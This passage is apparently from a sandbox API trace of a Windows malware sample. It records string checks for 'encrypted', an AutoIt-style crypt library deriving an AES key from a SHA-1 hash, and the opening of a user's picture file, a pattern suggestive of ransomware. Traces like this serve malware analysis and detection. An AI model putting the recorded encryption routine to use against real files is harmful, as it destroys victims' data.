lpString1="uJXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JXBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XBt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bt\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VyeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yeRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eRic.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0040.431] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.431] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0040.431] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.431] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.431] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.432] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.432] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.432] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.432] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.432] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0040.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77fd840, ftCreationTime.dwHighDateTime=0x1d5bf74, ftLastAccessTime.dwLowDateTime=0x6bebefd0, ftLastAccessTime.dwHighDateTime=0x1d5bcb3, ftLastWriteTime.dwLowDateTime=0x6bebefd0, ftLastWriteTime.dwHighDateTime=0x1d5bcb3, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="VyeRic.png", cAlternateFileName="")) returned 0x7c2100 [0040.432] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0040.432] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.432] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.432] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.432] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.432] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.432] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0040.432] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0040.433] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.433] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.433] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.433] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0040.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.433] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0040.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.434] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0040.434] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.434] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.434] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.434] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0040.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.435] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.435] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.435] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.435] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.435] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.435] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.435] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.435] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.435] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.436] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.436] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.436] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.436] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.436] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.436] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.436] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0040.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.437] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.437] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0040.437] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.437] CryptDestroyHash (hHash=0x7c2240) returned 1 [0040.437] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.437] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.437] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\VyeRic.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\vyeric.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0040.437] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.437] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0040.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.438] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0040.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0040.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0040.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0040.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.440] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0040.440] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt")) returned 0x10 [0040.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0040.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.440] HeapFree (in: hHeap=0x770000, 